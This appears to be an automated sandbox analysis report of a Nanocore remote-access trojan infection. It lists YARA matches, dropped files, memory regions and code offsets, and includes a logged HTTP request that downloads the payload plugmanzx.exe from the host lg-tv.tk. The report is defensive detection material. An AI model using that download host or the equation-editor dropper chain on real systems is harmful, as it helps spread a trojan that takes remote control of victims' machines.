        Source: global trafficHTTP traffic detected: GET /plugmanzx.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: lg-tv.tkConnection: Keep-Alive
        Source: RegSvcs.exeBinary or memory string: RegisterRawInputDevices

        E-Banking Fraud:

        barindex
        Yara detected Nanocore RATShow sources
        Source: Yara matchFile source: 8.2.RegSvcs.exe.764629.3.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 8.2.RegSvcs.exe.384dabc.7.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 8.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 8.2.RegSvcs.exe.760000.2.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 8.2.RegSvcs.exe.3848c86.6.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 8.2.RegSvcs.exe.384dabc.7.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 8.2.RegSvcs.exe.38520e5.8.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 4.2.plugmangd5693.exe.a1f94b8.10.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 8.2.RegSvcs.exe.760000.2.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 4.2.plugmangd5693.exe.a1f94b8.10.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 00000008.00000002.671662373.0000000000760000.00000004.00020000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.440005121.000000000A26C000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.439861078.000000000A161000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000008.00000002.671408794.0000000000402000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000008.00000002.673059693.0000000003826000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: plugmangd5693.exe PID: 1580, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 2996, type: MEMORYSTR

        System Summary:

        barindex
        Malicious sample detected (through community Yara rule)Show sources
        Source: 8.2.RegSvcs.exe.764629.3.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 8.2.RegSvcs.exe.384dabc.7.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 8.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 8.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 8.2.RegSvcs.exe.760000.2.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 8.2.RegSvcs.exe.3848c86.6.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 8.2.RegSvcs.exe.3848c86.6.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 8.2.RegSvcs.exe.5a0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 8.2.RegSvcs.exe.384dabc.7.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 8.2.RegSvcs.exe.38520e5.8.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 4.2.plugmangd5693.exe.a1f94b8.10.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 4.2.plugmangd5693.exe.a1f94b8.10.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 8.2.RegSvcs.exe.760000.2.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 4.2.plugmangd5693.exe.a1f94b8.10.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 4.2.plugmangd5693.exe.a1f94b8.10.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 8.2.RegSvcs.exe.2811644.5.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000008.00000002.671662373.0000000000760000.00000004.00020000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000008.00000002.671546681.00000000005A0000.00000004.00020000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000004.00000002.440005121.000000000A26C000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000004.00000002.440005121.000000000A26C000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000004.00000002.439861078.000000000A161000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000004.00000002.439861078.000000000A161000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000008.00000002.671408794.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000008.00000002.671408794.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000008.00000002.673059693.0000000003826000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: Process Memory Space: plugmangd5693.exe PID: 1580, type: MEMORYSTRMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: Process Memory Space: plugmangd5693.exe PID: 1580, type: MEMORYSTRMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: Process Memory Space: RegSvcs.exe PID: 2996, type: MEMORYSTRMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Office equation editor drops PE fileShow sources
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Roaming\plugmangd5693.exeJump to dropped file
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\plugmanzx[1].exeJump to dropped file
        .NET source code contains very large stringsShow sources
        Source: plugmanzx[1].exe.2.dr, ConsoleGame/Form1.csLong String: Length: 50988
        Source: plugmangd5693.exe.2.dr, ConsoleGame/Form1.csLong String: Length: 50988
        Source: RWbqWnnjDWI.exe.4.dr, ConsoleGame/Form1.csLong String: Length: 50988
        Source: 4.2.plugmangd5693.exe.330000.0.unpack, ConsoleGame/Form1.csLong String: Length: 50988
        Source: 4.0.plugmangd5693.exe.330000.0.unpack, ConsoleGame/Form1.csLong String: Length: 50988
        Source: 8.2.RegSvcs.exe.764629.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 8.2.RegSvcs.exe.764629.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 8.2.RegSvcs.exe.384dabc.7.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 8.2.RegSvcs.exe.384dabc.7.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 8.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 8.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 8.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 8.2.RegSvcs.exe.760000.2.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 8.2.RegSvcs.exe.760000.2.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 8.2.RegSvcs.exe.3848c86.6.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 8.2.RegSvcs.exe.3848c86.6.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 8.2.RegSvcs.exe.3848c86.6.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 8.2.RegSvcs.exe.5a0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 8.2.RegSvcs.exe.5a0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 8.2.RegSvcs.exe.384dabc.7.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 8.2.RegSvcs.exe.384dabc.7.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 8.2.RegSvcs.exe.38520e5.8.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 8.2.RegSvcs.exe.38520e5.8.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 4.2.plugmangd5693.exe.a1f94b8.10.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 4.2.plugmangd5693.exe.a1f94b8.10.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 4.2.plugmangd5693.exe.a1f94b8.10.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 8.2.RegSvcs.exe.760000.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 8.2.RegSvcs.exe.760000.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 4.2.plugmangd5693.exe.a1f94b8.10.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 4.2.plugmangd5693.exe.a1f94b8.10.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 4.2.plugmangd5693.exe.a1f94b8.10.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 8.2.RegSvcs.exe.2811644.5.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 8.2.RegSvcs.exe.2811644.5.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 00000008.00000002.671662373.0000000000760000.00000004.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000008.00000002.671662373.0000000000760000.00000004.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 00000008.00000002.671546681.00000000005A0000.00000004.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000008.00000002.671546681.00000000005A0000.00000004.00020000.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
        Source: 00000004.00000002.440005121.000000000A26C000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000004.00000002.440005121.000000000A26C000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000004.00000002.439861078.000000000A161000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000004.00000002.439861078.000000000A161000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000008.00000002.671408794.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: 00000008.00000002.671408794.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: 00000008.00000002.673059693.0000000003826000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: Process Memory Space: plugmangd5693.exe PID: 1580, type: MEMORYSTRMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
        Source: Process Memory Space: plugmangd5693.exe PID: 1580, type: MEMORYSTRMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: Process Memory Space: RegSvcs.exe PID: 2996, type: MEMORYSTRMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
        Source: C:\Users\user\AppData\Roaming\plugmangd5693.exeCode function: 4_2_006FE468
        Source: C:\Users\user\AppData\Roaming\plugmangd5693.exeCode function: 4_2_006FDC20
        Source: C:\Users\user\AppData\Roaming\plugmangd5693.exeCode function: 4_2_006F0200
        Source: C:\Users\user\AppData\Roaming\plugmangd5693.exeCode function: 4_2_006FEEF8
        Source: C:\Users\user\AppData\Roaming\plugmangd5693.exeCode function: 4_2_006F42D8
        Source: C:\Users\user\AppData\Roaming\plugmangd5693.exeCode function: 4_2_006FB2B8
        Source: C:\Users\user\AppData\Roaming\plugmangd5693.exeCode function: 4_2_006FE88A
        Source: C:\Users\user\AppData\Roaming\plugmangd5693.exeCode function: 4_2_006F4698
        Source: C:\Users\user\AppData\Roaming\plugmangd5693.exeCode function: 4_2_006F6692
        Source: C:\Users\user\AppData\Roaming\plugmangd5693.exeCode function: 4_2_006F7490
        Source: C:\Users\user\AppData\Roaming\plugmangd5693.exeCode function: 4_2_006FB740
        Source: C:\Users\user\AppData\Roaming\plugmangd5693.exeCode function: 4_2_006F5D58
        Source: C:\Users\user\AppData\Roaming\plugmangd5693.exeCode function: 4_2_006FDFCC
        Source: C:\Users\user\AppData\Roaming\plugmangd5693.exeCode function: 4_2_006F3D88
        Source: C:\Users\user\AppData\Roaming\plugmangd5693.exeCode function: 4_2_006F4A40
        Source: C:\Users\user\AppData\Roaming\plugmangd5693.exeCode function: 4_2_006FE457
        Source: C:\Users\user\AppData\Roaming\plugmangd5693.exeCode function: 4_2_006FF229
        Source: C:\Users\user\AppData\Roaming\plugmangd5693.exeCode function: 4_2_006FF238
        Source: C:\Users\user\AppData\Roaming\plugmangd5693.exeCode function: 4_2_006F8E38
        Source: C:\Users\user\AppData\Roaming\plugmangd5693.exeCode function: 4_2_006FC000
        Source: C:\Users\user\AppData\Roaming\plugmangd5693.exeCode function: 4_2_006FDC11
        Source: C:\Users\user\AppData\Roaming\plugmangd5693.exeCode function: 4_2_006FC010
        Source: C:\Users\user\AppData\Roaming\plugmangd5693.exeCode function: 4_2_006FEEE8
        Source: C:\Users\user\AppData\Roaming\plugmangd5693.exeCode function: 4_2_006FAAD8
        Source: C:\Users\user\AppData\Roaming\plugmangd5693.exeCode function: 4_2_006FCC8A
        Source: C:\Users\user\AppData\Roaming\plugmangd5693.exeCode function: 4_2_006FAA80
        Source: C:\Users\user\AppData\Roaming\plugmangd5693.exeCode function: 4_2_006FCC90
        Source: C:\Users\user\AppData\Roaming\plugmangd5693.exeCode function: 4_2_006F9368
        Source: C:\Users\user\AppData\Roaming\plugmangd5693.exeCode function: 4_2_006F9140
        Source: C:\Users\user\AppData\Roaming\plugmangd5693.exeCode function: 4_2_006F9358
        Source: C:\Users\user\AppData\Roaming\plugmangd5693.exeCode function: 4_2_006F9150
        Source: C:\Users\user\AppData\Roaming\plugmangd5693.exeCode function: 4_2_006F9738
        Source: C:\Users\user\AppData\Roaming\plugmangd5693.exeCode function: 4_2_006F3FE8
        Source: C:\Users\user\AppData\Roaming\plugmangd5693.exeCode function: 4_2_006F61C8
        Source: C:\Users\user\AppData\Roaming\plugmangd5693.exeCode function: 4_2_006FD1D0
        Source: C:\Users\user\AppData\Roaming\plugmangd5693.exeCode function: 4_2_006FC5B0
        Source: C:\Users\user\AppData\Roaming\plugmangd5693.exeCode function: 4_2_006FB9B0
        Source: C:\Users\user\AppData\Roaming\plugmangd5693.exeCode function: 4_2_006F958A
        Source: C:\Users\user\AppData\Roaming\plugmangd5693.exeCode function: 4_2_006F8189
        Source: C:\Users\user\AppData\Roaming\plugmangd5693.exeCode function: 4_2_006F8198
        Source: C:\Users\user\AppData\Roaming\plugmangd5693.exeCode function: 4_2_006F9598
        Source: C:\Users\user\AppData\Roaming\plugmangd5693.exeCode function: 4_2_006FC594
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeCode function: 8_2_00763DFF
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeCode function: 8_2_00765AD1
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeCode function: 8_2_00452418
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeCode function: 8_2_004538C8
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeCode function: 8_2_00459988
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeCode function: 8_2_00458D88
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeCode function: 8_2_0045B658
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeCode function: 8_2_00453020
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeCode function: 8_2_004530E7
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeCode function: 8_2_00459A4F
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeCode function: 8_2_0045A230
        Source: C:\Users\user\AppData\Roaming\plugmangd5693.exeCode function: 4_2_01D01ECA NtQuerySystemInformation,
        Source: C:\Users\user\AppData\Roaming\plugmangd5693.exeCode function: 4_2_01D01E90 NtQuerySystemInformation,
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeCode function: 8_2_004D16DA NtQuerySystemInformation,
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeCode function: 8_2_004D169F NtQuerySystemInformation,
        Source: C:\Users\user\AppData\Roaming\plugmangd5693.exeMemory allocated: 76F90000 page execute and read and write
        Source: C:\Users\user\AppData\Roaming\plugmangd5693.exeMemory allocated: 76E90000 page execute and read and write
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeMemory allocated: 76F90000 page execute and read and write
        Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeMemory allocated: 76E90000 page execute and read and write
